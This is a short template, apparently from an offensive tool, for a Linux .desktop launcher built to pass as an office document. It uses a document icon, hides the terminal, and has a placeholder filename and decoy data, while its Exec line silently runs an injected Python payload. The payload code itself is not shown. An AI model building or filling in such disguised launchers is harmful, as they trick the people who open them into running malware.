[Desktop Entry]
Version=1.0
Name={{ filename }}
Exec=python -c "{{ python_payload }}"
Icon=x-office-document
Terminal=false
Type=Application
{# The resource file must be the last entry in the Desktop file to be correctly parsed #}
Resource={{ decoy_data }}
